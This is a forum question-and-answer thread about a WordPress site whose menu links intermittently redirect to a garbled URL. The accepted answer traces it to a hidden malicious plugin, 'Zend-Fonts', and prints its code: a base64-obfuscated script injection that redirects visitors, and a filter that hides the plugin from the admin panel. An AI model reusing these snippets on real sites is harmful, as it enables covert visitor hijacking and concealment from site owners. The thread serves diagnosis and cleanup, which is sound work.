skip to Main Content

I really couldn’t find anything on this, not even somebody with the same problem:

Our WordPress Page recently started giving us errors when navigating through the menu.

Sometimes – but not always – if you click one of the menu items that usually get you to one of the subpages, the called URL in the URL bar gets "deformed" to something like "https://array/?u=t11kd0b&o=zac8myd&m=1".

Which is nonesense and leads to an error, of course.

You have to go back or reload the page and if you click again, the request gets processed normally and the correct page loads and the error is no longer occuring. It seems to be only randomly reproducible.

It seems the error comes back after a restart of the browser…

Any ideas on this?
Is this reproducible for you?

We tried different machines and browsers and it happens on all of them.

Any help would be greatly appreciated!

2

Answers


  1. Chosen as BEST ANSWER

    Ok..... I found the problem. Malware. It seems to be a problem with a "hidden plugin" called Zend-Fonts which we never installed. It didn't show up in the plugin panel (unless I went through the recovery mode of the health check plugin).

    I took a look at the plugin .php file and found the string that appeared in our URL bar at times in this function:

    if (!$_COOKIE[base64_decode('aHRfcnI=') ]) {
            setcookie( base64_decode( 'aHRfcnI=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
    
            echo base64_decode( 'PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi' ) . 'https://'.$url.'/?u=t11kd0b&o=zac8myd&m=1' . base64_decode( 'Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi' ) . 'https://'.$url.'/?u=t11kd0b&o=zac8myd&m=1' . base64_decode( 'Ijs8L3NjcmlwdD4=' );
        }
    }
    

    This seems to be the code to hide the plugin (how nice to document the code properly...):

    //hide plugin
    add_filter('all_plugins', 'hide_plugins');
    function hide_plugins($plugins) {
        unset($plugins['zend-fonts-wp/zend-fonts-wp.php']);
        return $plugins;
    }
    

    I couldn't delete the plugin in recovery mode however.... so I removed the plugin's folder in my wordpress installation (wp-contents/plugins/zend-fonts-wp).

    Lets hope this is enough....

    Google Search did not give me much on that plugin / malware. It seems to want to redirect to some XXX site.

    Hope this helps anybody encountering the same.

    EDIT: Looking through the plugins code I also found some entries to the WordPress SQL Database.

    I deleted the databases that were referenced in the code "wp_zen_timetable" and "wpusers_inputs"

    You can identify those are not from WordPress since their type/Engine is MyISAM (all other DBs were InnoDb) - so they stick out if you sort your databases by DB Type.


  2. Had this malware plugin appear on one of my sites – it predominantly is a link redirect hack. As above we removed the plugin folder and it came back. Removed again & changed all user passwords and activated 2FA but there was still some database activity linked to the removed plugin. Website scans on sucuri also showed issues still.
    The only solution we found was to remove/replace all the core wordpress & plugin files…..
    My suspicion is that there was malware on a users device which provided the password for the entry point – suggest all users devices are also scanned for malware!

    Login or Signup to reply.
Please signup or login to give your own answer.
Back To Top
Search